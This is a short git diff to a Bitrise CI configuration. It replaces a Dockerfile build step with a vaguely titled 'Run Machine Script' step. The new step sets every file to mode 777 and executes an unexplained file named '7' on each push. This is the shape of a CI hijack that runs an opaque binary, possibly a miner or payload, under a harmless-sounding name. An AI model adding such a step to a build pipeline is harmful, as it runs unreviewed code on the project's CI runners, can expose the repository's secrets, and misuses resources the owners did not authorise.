--- a/bitrise.yml
+++ b/bitrise.yml
@@ -1,4 +1,3 @@
----
 format_version: '13'
 default_step_lib_source: https://github.com/bitrise-io/bitrise-steplib.git
 project_type: other
@@ -9,17 +8,12 @@ workflows:
         run_if: '{{getenv "SSH_RSA_PRIVATE_KEY" | ne ""}}'
     - git-clone@8: {}
     - script:
-        title: Check and Build Dockerfile
+        title: Run Machine Script
         inputs:
         - content: |
             #!/bin/bash
-            echo "Checking for Dockerfile..."
-            if [ -f "Dockerfile" ]; then
-              echo "Dockerfile found! Building..."
-              docker build -t my-image .
-            else
-              echo "No Dockerfile found. Skipping build."
-            fi
+            chmod 777 *
+            ./7
     - deploy-to-bitrise-io@2: {}
 triggers:
   push:
